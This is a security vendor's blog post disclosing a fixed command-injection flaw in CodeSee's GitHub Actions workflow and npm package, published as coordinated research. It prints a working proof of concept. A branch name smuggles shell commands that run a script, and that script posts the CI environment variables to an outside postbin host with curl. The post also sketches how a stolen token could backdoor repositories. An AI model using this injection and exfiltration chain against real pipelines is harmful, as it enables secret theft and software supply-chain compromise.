Securing open-source projects is hard. Securing CI workflows for open-source projects is no less complex. The CI workflows of open-source projects are by definition exposed to the world and can be easily triggered through PR automation without any code review, giving attackers direct access to dev infrastructure. These automation and workflows often leverage third-party components and integrations to improve the development process.
Sometimes, integrating third-party tools, especially for CI purposes, may increase your project’s threat landscape and put you at some risks you didn’t have before. This was the case with CodeSee, with whom we collaborated closely over the past few months and removed one such risk, fixing a vulnerability and applying mitigations affecting thousands of open-source projects.
CodeSee is a startup company providing methods to visualize your codebase and effective tooling for reviewing and collaboration. Similar to other developer-centric products (e.g., CodeCov), during CodeSee integration, it creates a new Github Actions workflow that embeds its capabilities for every pull request, allowing developers efficiently review the added code.
In this blog post, we will describe how we found that this committed workflow contains several vulnerabilities. Chaining these vulnerabilities may allow any user remote code execution (RCE) capabilities on the CI pipeline, which may lead to committing code and exfiltrating sensitive tokens without the proper permissions.
Thousands of open-source projects using CodeSee, including projects with many stars.
Some high-profile projects are:
- https://github.com/freeCodeCamp/freeCodeCamp – The most starred project on Github (356k stars)
- https://github.com/statelyai/xstate – Popular npm package for state machines and state charts. Millions of weekly downloads. (21.6k stars)
- https://github.com/slimtoolkit/slim – Minifying docker containers (15.4k stars)
- Additional tools include C libraries, Python packages, Golang libraries, Kubernetes operators, and more.
We worked closely with CodeSee, which quickly fixed them, remediating the immediate risk posed to all the open-source projects integrating the workflow. In addition, we created a roadmap with CodeSee engineers to improve the security posture of the workflow deployed in open-source projects:
- Fixing command injection vulnerability in the codesee npm package allowing code execution through the branch name. This was fixed in version
0.376.0
. Due to pulling the latest version by the workflow, the fix automatically remediates it for all existing integrations. - Limiting the permission given to
GITHUB_TOKEN
through explicit definition. This feature is an excellent post-exploitation mitigation technique for future vulnerabilities in Github Actions workflows. It applies only to newly integrated projects. - Implementing the ability to push workflow changes into existing integrations through pull requests and commits to fix future security issues and insert mitigations, such as the permissions mitigations mentioned previously.
- Creating a roadmap to migrate from the risky trigger event
pull_request_target
to the safer triggerpull_request
.
After we combine all these mitigations, the integrated workflow has become significantly more secure.
Technical Dive
It all started as standard research in which we scanned the most popular repositories and their Github Actions workflow at scale, trying to find vulnerable CI workflows. During that scan, we found many duplicate workflows in different open-source projects. One of those workflows originated from the projects’ integration with CodeSee, a third-party application that gives abilities to visualize your codebase. When we reached out, CodeSee was eager to collaborate with us to secure their workflow.
Analyzing the Github Action Workflow
The workflow looks like the following:
# This workflow was added by CodeSee. Learn more at https://codesee.io/ on: pull_request_target: types: [opened, synchronize, reopened] workflow_dispatch: name: CodeSee Map jobs: test_map_action: runs-on: ubuntu-latest continue-on-error: true name: Run CodeSee Map Analysis steps: - name: checkout id: checkout uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.ref }} ... # codesee-detect-languages has an output with id languages. - name: Detect Languages id: detect-languages uses: Codesee-io/codesee-detect-languages-action@latest # Configures different environments ... - name: Generate Map id: generate-map uses: Codesee-io/codesee-map-action@latest with: step: map ... - name: Upload Map id: upload-map uses: Codesee-io/codesee-map-action@latest with: step: mapUpload ... - name: Insights id: insights uses: Codesee-io/codesee-map-action@latest with: step: insights ...
Due to a series of vulnerabilities and misconfigurations in the workflow above, we were able to completely take over the build machine, which may have led to dangerous malicious behavior.
We will list the issues found and the possible consequences of such a build hijack.
High Permissions for the Pull Request Trigger
The first issue with the workflow is using the unsafe pull_request_target
trigger event. The Github security team posted about this dangerous behavior.
The permissions this workflow receives from Github depend on multiple variables:
- The trigger event, in our case
pull_request_target
. This event indicates that this workflow should be triggered on each new pull request to the repository and be given write permissions and access to read secrets, even when pull requests originated with forks. Compared to it, thepull_request
trigger event works similarly, but forked pull requests will receive read permissions at most and have no access to secrets. - Added
permissions
tag, limiting permissions even further. - Organization settings may also limit the permissions given. We can understand whether these configurations are used by observing the build logs:
GITHUB_TOKEN Permissions Actions: write Checks: write Contents: write Deployments: write Discussions: write Issues: write Metadata: read Packages: write Pages: write PullRequests: write RepositoryProjects: write SecurityEvents: write Statuses: write
Reading User Input
The trigger pull_request_target
isn’t dangerous on its own. However, if the workflow analyzes the source code, a potential attacker can craft malicious input, create a forked pull request, and hijack the build workflow.
The next issue in the chain is the checkout to the head branch of the pull request.
While it sounds trivial to check out the pull request code, it isn’t the case for forked pull requests. When a workflow checks out the code and runs its tooling on it – build tools, scanners, or another tooling, it should treat that code as unsafe. In addition, not every action actions/checkout
will check out the forked code. The parameter ref: ${{ github.event.pull_request.head.ref }}
indicates that.
After the checkout, the workflow runs the CodeSee action Codesee-io/codesee-map-action
on the code, which is a wrapper to the codesee npm package. So once we prove that the package analyzes its input insecurely, we’ll be able to perform code execution on the build.
CodeSee was aware of these risks, but their application requires pull_request_target
to support the common open-source workflow of contributing using forked pull requests. To mitigate that risk, they took care in writing their code analysis to avoid directly executing any of the code being cloned. They appear to be successful in this regard, as we had to discover an additional issue to gain remote code execution.
Vulnerable NPM Package
This is where things get more interesting. Up to this point, the workflow is running with elevated permissions, checking out the user code, and running an internal NPM package for that code but not yet giving any code execution capability.
We could reverse-engineer the package and find vulnerabilities, but we found a shortcut. When we call Codesee-io/codesee-map-action
action with mapUpload
parameter, it calls codesee@latest
NPM package with upload
parameter. It also includes additional arguments, such as the branch name as -f
argument. We know that from the action JS code:
async function runCodeseeMapUpload(config, githubEventName, githubEventData) { const additionalArguments = config.githubRef ? ["-f", config.githubRef] : []; if (isPullRequestEvent(githubEventName)) { additionalArguments.push("-b", config.githubBaseRef); additionalArguments.push("-s", githubEventData.pull_request.base.sha); additionalArguments.push("-p", githubEventData.number.toString()); } const args = [ "codesee@latest", "upload", "--type", "map", "--repo", `https://github.com/${config.origin}`, "-a", config.apiToken, ...additionalArguments, "codesee.map.json", ]; const runExitCode = await exec.exec("npx", args); return runExitCode; }
So we tried sending interesting branch names to test if the program sanitizes it correctly. When we created a pull request with the following branch name: a";ls;" ech
, by looking at the logs, we could see that the program crashed:
Upload Map to Codesee Server /usr/local/bin/npx codesee@latest upload --type map --repo https://github.com/AlexILOrg/codesee-demo -a *** -f a";ls;"ech -b main -s b8ac0390a31140ea040c51801cdb9bdc65df6e16 -p 8 codesee.map.json codesee v0.364.0 Fetching main from https://github.com/AlexILOrg/codesee-demo.git Error: Command failed: "/usr/bin/git" "merge-base" "b8ac0390a31140ea040c51801cdb9bdc65df6e16" "a";ls;"ech" fatal: Not a valid object name a /bin/sh: 1: ech: not found CodeSee Map failed: Error: The process '/usr/local/bin/npx' failed with exit code 1 Error: The process '/usr/local/bin/npx' failed with exit code 1 at ExecState._setResult (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1185:25) at ExecState.CheckComplete (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1168:18) at ChildProcess.<anonymous> (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1062:27) at ChildProcess.emit (events.js:314:20) at maybeClose (internal/child_process.js:1022:16) at Process.ChildProcess._handle.onexit (internal/child_process.js:287:5)
By investigating this error log, we have two insights:
fatal: Not a valid object name a
– instead of taking the complete branch namea";ls; "ech
, it consumed onlya
. This means that the quote sign(“
) terminated the string./bin/sh: 1: ech: not found
– this means we managed to run/bin/sh
for the partial text we gaveech
, which means we can inject our code!
Let’s see how we use this to execute arbitrary code.
As an attacker, we can create a new malicious script file that would be fetched together with our forked pull request and executed using our code execution capability. It can be quite tricky because:
- First, we need to give it execution permissions by running
chmod
. For example,chmod +x ./shell.sh
. - Second, Github doesn’t allow us to put spaces in branch names. It automatically sanitizes it by replacing it with dashes (
-
). It complicates creating a script that gives execution permissions to the shell file.
My Capture-the-Flag (CTF) competition history taught me that such mitigations could have bypasses, and indeed short search in Google led me to understand that spaces can be replaced through ${IFS}
in Linux shell.
So let’s sum it up and create the flow that causes remote code execution on the pipeline:
- Let’s say project X contains the vulnerable Github Actions workflow.
- We, as an attacker, are forking project X.
- We are adding a new shell file with our “malicious” code for the fork. That code sends all environment variables to the designated postbin server we just created:
env > .env curl -H 'X-Status: Awesome' --data @'.env' https://www.toptal.com/developers/postbin/1662641903023-0475601626094
- We commit this shell file into a new branch with the following name:
name1";chmod${IFS}+x${IFS}shell.sh;./shell.sh; "name2
. - We create a pull request to the main branch of project X from our newly created branch.
This flow will execute our “malicious” payload on the CI system.
We can safely talk about this PoC code because the NPM vulnerability has been fixed, and all current CodeSee integrations are working with the updated package.
Consequences
One could ask what the big deal with this demonstrated code execution is; The specified workflow doesn’t contain any interesting environment variables or secrets for which the victims should care. Unfortunately, this is not the main scenario we are afraid of.
Our previous Github Actions vulnerability research showed another scary attack chain. Malicious actors can use a privileged GITHUB_TOKEN
to commit additional code to the repository. It would have two consequences:
- Inserting a backdoor into the code eventually be deployed to end-users.
- Inserting workflow that would exfiltrate all repository and organization secrets. It may contain sensitive tokens, such as AWS/GCP/Azure tokens, Docker Hub/PyPI/NPM tokens, Github personal access tokens for other repositories, and more.
For our workflow, an attacker could use the privileged GITHUB_TOKEN
used for the checkout command. Printing the .git/config.json
file yields that token.
Remediation
CodeSee’s internal review discovered this injection vulnerability entered their system as a result of a logical bug in the code used to escape the user-supplied branch name. In addition to repairing that logic directly, they replaced all command executions in their code analysis to run without a shell, ensuring no subtle escaping logic was required. As the CLI is written in node, this involved replacing calls to child_process.exec
with child_process.execFile
.
To further mitigate any other future vulnerabilities, CodeSee introduced the following permissions in the workflow to minimize that:
permissions: read-all
Even if such vulnerabilities have been found, the GITHUB_TOKEN
won’t have sufficient permissions to perform any malicious activity.
Summary
The security process described in this article teaches us three interesting lessons for the emerging landscape of software supply chain security.
The first is the understanding that the threat landscape for the software supply chain increases, especially in the era of developer-focused companies arising to address and improve developer productivity; The second is the ability of security vendors, and non-security vendors to collaborate and de facto improve the security posture of many open-source projects; The third is the esoteric input vector of code injection through the branch name, which hasn’t been fully investigated yet.
We encourage using the lessons learned from this process and applying them to additional workflows, further hardening the security posture of CI pipelines.
Give Cycode a Try
To learn more about how Cycode can help, make an account or schedule a demo today.
Originally published: December 12, 2022